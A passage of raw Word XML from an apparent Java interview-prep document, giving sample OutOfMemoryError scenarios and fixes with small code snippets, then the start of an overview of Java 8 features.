        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="222" w:name="_Toc197867436"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Have you ever got outOfMemory exceptions? Can you tell me any scenarios where you have faced this exception?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
    <w:p w14:paraId="1449B76C" w14:textId="3C19227F" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A683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 don’t personally experience exceptions, I can definitely walk you through </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-world scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the OutOfMemoryError can occur and how developers typically encounter it. This will give you a good understanding of how </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>this exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can arise in different situations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0E74A3"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Scenarios Leading to OutOfMemoryError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249D7938"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rge Object Creation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48401151"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When your application tries to allocate large arrays or collections that exceed the JVM heap size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE51E33"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC479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786A57D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B9BE4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largeArray = new int[Integer.MAX_VALUE];  // Large array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC5B9E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78D1E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18F9E9"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Here, attempting to create an array larger than the maximum available memory for the heap can trigger an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0538309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46847">
          <v:rect id="_x0000_i1663" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC0B1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emory Leaks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E33023E"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Keeping references to objects that are no longer needed, preventing them from being garbage collected, which results in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5E9F2E6"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B180418"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Leak {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636202C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2127CD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4D16E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ddData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7590D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B423C8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Some long data...");  // Continuously adding data without clearing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719F31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90B68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B6C0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F14007"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If you are continuously adding data to a collection (like an ArrayList), and never clearing it, you will eventually run out of memory, leading to an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5232400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15A8A">
          <v:rect id="_x0000_i1664" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCE630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roper Use of Caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BA806D"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Storing too many objects in memory for quick access (e.g., caching), but never releasing unused or expired objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DDB0E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0D9AAC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cheExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6979419F"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Integer, String&gt; cache = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD76CE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7A4C6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acheData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D143B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 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1F7D7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361D7B6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che.put(i++, "Data " + i);  // Adding unlimited data without any expiration policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414D0B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98380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AA30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1FBEA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When there's no expiration or eviction policy for cached objects, your memory usage keeps increasing, leading to an eventual OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E3039C"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7B2597">
          <v:rect id="_x0000_i1665" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="770E4ECF"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Too Many Threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF264EA"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Creating a large number of threads in an application without considering the JVM's stack size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40165FD1"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566A3A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hreadCreation {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA1FA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A0140F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D25676B"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Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD561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mpty thread, doing nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD026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rt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B1226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170C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83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00AB63"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Each thread consumes memory, and if you try to spawn too many threads, you could exceed the JVM's </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack space</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, causing an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBD33A"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5DFA4E">
          <v:rect id="_x0000_i1666" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A31EE0"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aspace Out of Memory (Java 8+):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E46A2A"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Running out of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memory, which is where </w:t>
      </w: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e.g., method definitions, class structures) is stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C9B197"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BAEA9A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edly loading classes dynamically in a loop without unloading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AF1D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 i = 0; i &lt; 100000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FFE37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forName("com.somepackage.SomeClass");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C690C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AC9A20"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If too many classes are loaded into memory without being unloaded, the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can run out of space, causing an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA19F2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8641E">
          <v:rect id="_x0000_i1667" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C649495"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Large File Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A4EF1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Trying to load a very large file into memory in one go.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47764DA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208EE8C0"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Loader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2583CDB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4C78AA2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yte[] data = Files.readAllBytes(Paths.get("largefile.txt"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C24292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4BA39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FE3AC"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This can cause an OutOfMemoryError if the file is too large to fit in the heap space allocated to the JVM. Using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BufferedRea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to process large files in chunks would avoid this issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E1514"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05AE4F">
          <v:rect id="_x0000_i1668" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="485B60B4"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tigating OutOfMemoryError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7499BB52"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 Heap Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can increase the maximum heap size using the -Xmx JVM argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B42223" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="947"/>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x2g YourApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E818A"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Profilers and Monitoring Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: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Profil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AT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help identify memory leaks or excessive memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C6965"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Data Structures</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Choose memory-efficient data structures (e.g., LinkedList vs. ArrayList, or WeakHashMap for caching).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E340E7F"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 Threads Properly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread pool</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ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) instead of spawning new threads directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D10EE"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Tuning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tune garbage collection policies if you have very specific memory requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1F386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FCFD9E">
          <v:rect id="_x0000_i1669" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C48FC1"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23CBB702" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A68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OfMemoryError is often the result of improper memory management, such as large object creation, memory leaks, or unoptimized caching strategies. It's crucial to monitor your application's memory consumption and implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>best practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for managing resources efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD3E156" w14:textId="3E5DAFE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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE33F2" w14:textId="0018136C" w:rsidR="00DD2727" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD2727" w:rsidP="00495831">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF8D5A" w14:textId="4D2A8962" w:rsidR="00505FCD" w:rsidRPr="00CE4B95" w:rsidRDefault="00505FCD" w:rsidP="00505FCD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="223" w:name="_Toc197867437"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java 8 Features</w:t>
      </w:r>
      <w:bookmarkEnd w:id="223"/>
    </w:p>
    <w:p w14:paraId="3191F20C" w14:textId="77777777" w:rsidR="00505FCD" w:rsidRPr="00CE4B95" w:rsidRDefault="00505FCD" w:rsidP="00B13CFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9503BD"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4" w:name="_Toc197867438"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java8 features?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="224"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD339E" w14:textId="2EAFEF6C" w:rsidR="00520371" w:rsidRPr="00CE4B95"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Java 8 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EA6460"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Java 8, released in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>March 2014</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, was a major release that introduced </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>functional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>default methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, making Java much more expressive and modern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401984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9E74544">
          <v:rect id="_x0000_i1671" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF7437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1. Lambda Expressions (JEP 126)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E5079A"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Introduces anonymous functions to make code more concise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADA18B2"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p>
    <w:p w14:paraId="54F347F4" w14:textId="1FEA63FE"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7880D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Reduces boilerplate for iterators, callbacks, and functional logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C4120"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85918B2">
          <v:rect id="_x0000_i1672" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDB21D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2. Functional Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF392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 interface with a single abstract method, used as the target for lambda expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238BDA00"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736EE05"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Fun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5607C1"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p>
    <w:p w14:paraId="1047CC62" w14:textId="5C333330"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9D3F8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xamples: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Runn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all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Predicat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unction</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nsumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A6AB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D153A14">
          <v:rect id="_x0000_i1673" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FCDE6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3. Stream API (JEP 107)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EDBD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Provides a high-level abstraction for processing sequences of elements (like collections) in a declarative way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E004B7"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821D1DA"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E6A42EE" w14:textId="2617051A"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6E8E2E7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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>map</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ilter</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reduc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llect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F98BE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3262142B">
          <v:rect id="_x0000_i1674" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CB751D"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4. Default and Static Methods in Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75589B0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interfaces to have method implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172131A5"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A4ECC"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2DC95E"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7192EC4B"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7FEE96"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F0B55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A14C4"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAB593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8621C6" w14:textId="5AFC1420"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E9284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nables interface evolution without breaking existing implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BBB2DE"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7AC75AF">
          <v:rect id="_x0000_i1675" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C9BE86"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5. Method References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179EE64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calling existing methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABE965" w14:textId="61325584" w:rsidR="004033C5" w:rsidRPr="00CE4B9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3D3B9A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than writing lambdas when reusing existing methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329C17A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E2BA007">
          <v:rect id="_x0000_i1676" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29442FA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6. Optional Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E5905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ntainer to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> values more gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E62D63B" w14:textId="77777777"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Nul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5691D0B7" w14:textId="5277EF15"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0C1EB3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voids </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>NullPointerException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and encourages functional style handling of absence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A9BB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7. Date and Time API (java.time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57454FB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mprehensive replacement for legacy </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>java.util.Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Calendar</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E61EEE" w14:textId="77777777"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to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w</w:t>
      </w:r>
